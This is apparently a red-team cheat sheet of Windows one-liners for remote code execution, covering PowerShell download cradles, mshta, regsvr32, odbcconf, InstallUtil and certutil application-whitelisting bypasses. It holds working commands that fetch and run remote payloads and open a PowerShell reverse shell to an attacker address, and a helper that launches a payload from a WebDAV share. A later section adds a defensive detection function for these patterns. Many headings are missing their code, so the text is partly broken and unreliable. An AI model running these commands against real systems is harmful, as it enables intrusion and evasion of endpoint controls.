Oneliners for Code Execution

PowerShell

powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

The second form matters on hosts behind an authenticating proxy: Net.WebClient's Proxy property is the process-wide default proxy, so setting its credentials before the download lets iwr authenticate with the current user's Windows credentials.

But you can also fetch the payload directly from a WebDAV server over a UNC path:

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Note that UNC access to a WebDAV share goes through the WebClient service on the target. It is set to Manual start on workstations and is an optional feature on server SKUs, so check that it is running before relying on this delivery method.
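The following is an added example, not code from the original post: a pre-flight check for the UNC/WebDAV delivery method that reports whether the WebClient service is present and running and whether the share path resolves, before the -File launch is attempted. The server name and path are assumptions; replace them with your own.

```powershell
# Added example (not from the original post): pre-flight check for UNC/WebDAV delivery.
# The UNC path below is an assumed placeholder, not a real server.
function Test-WebDavDelivery {
    param(
        [Parameter(Mandatory)] [string] $UncPath   # e.g. \\webdavserver\folder\payload.ps1
    )
    $svc = Get-Service -Name WebClient -ErrorAction SilentlyContinue
    $result = [pscustomobject]@{
        UncPath          = $UncPath
        WebClientPresent = [bool]$svc
        WebClientRunning = ($null -ne $svc -and $svc.Status -eq 'Running')
        PathReachable    = $false
    }
    # A \\host\share lookup only falls back to the WebDAV redirector while the
    # WebClient service is running; without it the path fails even if the
    # server is up, so there is no point testing it in that case.
    if ($result.WebClientRunning) {
        $result.PathReachable = Test-Path -LiteralPath $UncPath -ErrorAction SilentlyContinue
    }
    return $result
}

$check = Test-WebDavDelivery -UncPath '\\webdavserver\folder\payload.ps1'
$check | Format-List

if ($check.PathReachable) {
    # Same delivery as the one-liner above, launched from an existing session.
    powershell.exe -ExecutionPolicy Bypass -File $check.UncPath
} else {
    Write-Warning 'WebDAV path not reachable; use an HTTP download cradle instead.'
}
```

Starting the WebClient service yourself normally needs local administrator rights, so on a host where it is stopped the HTTP cradles above are the more reliable option.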

Cmd

Check out the great work by Arno0x: the Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior's work) shows that you can easily embed and execute any binary, DLL or script from a plain batch file:

Cscript/Wscript

Mshta

As used by the koadic framework, mshta accepts a URL as its argument and will execute the HTA file it serves:

Rundll32

Wmic

Regasm/Regsvcs

Application whitelisting bypass techniques discovered by @subTee. You need to build a specific DLL (it can be written in .NET/C#) that exposes the proper interfaces: a class with static methods marked [ComRegisterFunction] and [ComUnregisterFunction], which Regasm and Regsvcs invoke during registration and unregistration (the /U unregister path is the usual choice since it needs no elevation). You can then call the DLL over WebDAV:

Regsvr32

Another one from @subTee. This one requires a slightly different scriptlet (a COM scriptlet, .sct) from the HTA used with mshta above. First option:

Second option using UNC/WebDAV:

Odbcconf

Note that the DLL file does not need a .dll extension: odbcconf's regsvr action simply loads the file and calls its DllRegisterServer export. It can also be downloaded using UNC/WebDAV:

Msbuild

Certutil

Great work by @subTee for discovering this:

Now combining several of these commands in one line, with InstallUtil.exe executing a specific DLL as the payload. The DLL must contain a class marked [RunInstaller(true)] that derives from System.Configuration.Install.Installer and overrides Uninstall, since the /U switch runs the uninstall path without the installer logging that the install path requires:

You could also simply deliver an executable:
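The following PowerShell is an added example, not code from the original post or from any of the projects it credits: a small hunting function that applies the command-line patterns discussed on this page (PowerShell cradles, mshta, rundll32, wmic, regasm/regsvcs, regsvr32, odbcconf, msbuild, certutil, InstallUtil) to process-creation events. The rules are heuristics, and the hostnames, paths and URLs in the sample events are constructed for the demonstration, not real telemetry.

```powershell
# Added example (not from the original post): hunt for the LOLBin execution patterns
# described on this page in process-creation telemetry (Sysmon Event ID 1 or
# Security 4688). Rules are heuristics and will need tuning for your environment.
$Rules = @(
    @{ Name = 'PowerShell download cradle or UNC -File'; Image = '^(powershell|pwsh)\.exe$'
       Pattern = '(iwr|invoke-webrequest|downloadstring|net\.webclient|-f(ile)?\s+\\\\)' }
    @{ Name = 'mshta with remote HTA';        Image = '^mshta\.exe$';              Pattern = '(https?://|\\\\)' }
    @{ Name = 'rundll32 javascript: URL';     Image = '^rundll32\.exe$';           Pattern = 'javascript:' }
    @{ Name = 'wmic /format: remote XSL';     Image = '^wmic\.exe$';               Pattern = '/format:\S*(https?://|\\\\)' }
    @{ Name = 'regasm/regsvcs from UNC path'; Image = '^(regasm|regsvcs)\.exe$';   Pattern = '\\\\' }
    @{ Name = 'regsvr32 scriptlet';           Image = '^regsvr32\.exe$';           Pattern = '(/i:\S*(https?://|\\\\)|scrobj\.dll)' }
    @{ Name = 'odbcconf regsvr action';       Image = '^odbcconf\.exe$';           Pattern = 'regsvr' }
    @{ Name = 'msbuild project from user-writable or UNC path'; Image = '^msbuild\.exe$'; Pattern = '(\\temp\\|\\users\\|\\\\)' }
    @{ Name = 'certutil download/decode';     Image = '^certutil\.exe$';           Pattern = '-(urlcache|decode|encode)' }
    @{ Name = 'installutil /U payload';       Image = '^installutil\.exe$';        Pattern = '(/u\b|/logtoconsole)' }
)

function Find-LolbinExecution {
    # Takes objects with Host, Image, ParentImage and CommandLine (the fields you get
    # from Sysmon EID 1) and emits one record per rule hit. -match is case-insensitive.
    param([Parameter(Mandatory)] [object[]] $Events)
    foreach ($e in $Events) {
        $image = [IO.Path]::GetFileName($e.Image)
        foreach ($r in $Rules) {
            if ($image -match $r.Image -and $e.CommandLine -match $r.Pattern) {
                [pscustomobject]@{
                    Rule        = $r.Name
                    Host        = $e.Host
                    Parent      = [IO.Path]::GetFileName($e.ParentImage)
                    CommandLine = $e.CommandLine
                }
            }
        }
    }
}

# Constructed sample events; hostnames, paths and URLs are made up for the demo.
$Sample = @(
    [pscustomobject]@{ Host='WS01'; Image='C:\Windows\System32\mshta.exe';     ParentImage='C:\Windows\System32\cmd.exe';     CommandLine='mshta http://webserver/payload.hta' }
    [pscustomobject]@{ Host='WS01'; Image='C:\Windows\System32\regsvr32.exe';  ParentImage='C:\Windows\System32\cmd.exe';     CommandLine='regsvr32 /s /n /u /i:\\webdavserver\folder\payload.sct scrobj.dll' }
    [pscustomobject]@{ Host='WS02'; Image='C:\Windows\System32\certutil.exe';  ParentImage='C:\Windows\System32\cmd.exe';     CommandLine='certutil -urlcache -split -f http://webserver/payload.b64 payload.b64' }
    [pscustomobject]@{ Host='WS02'; Image='C:\Windows\System32\odbcconf.exe';  ParentImage='C:\Windows\explorer.exe';         CommandLine='odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}' }
    [pscustomobject]@{ Host='WS03'; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='powershell -exec bypass -f \\webdavserver\folder\payload.ps1' }
    # Benign lines that should not fire: normal DLL registration and a certificate check.
    [pscustomobject]@{ Host='WS03'; Image='C:\Windows\System32\regsvr32.exe';  ParentImage='C:\Windows\System32\msiexec.exe'; CommandLine='regsvr32 /s C:\Windows\System32\msxml3.dll' }
    [pscustomobject]@{ Host='WS03'; Image='C:\Windows\System32\certutil.exe';  ParentImage='C:\Windows\System32\cmd.exe';     CommandLine='certutil -verify C:\certs\server.cer' }
)

Find-LolbinExecution -Events $Sample | Format-Table -AutoSize
```

To run this against live data, build the event objects from Get-WinEvent (for Sysmon: -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}, reading Image, ParentImage and CommandLine from the event's properties). Security 4688 only carries the command line if "Include command line in process creation events" is enabled under the Audit Process Creation policy. The rules deliberately key on the UNC/WebDAV and URL arguments this page relies on, which is why the two benign lines produce no hit.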

This information was referenced from:
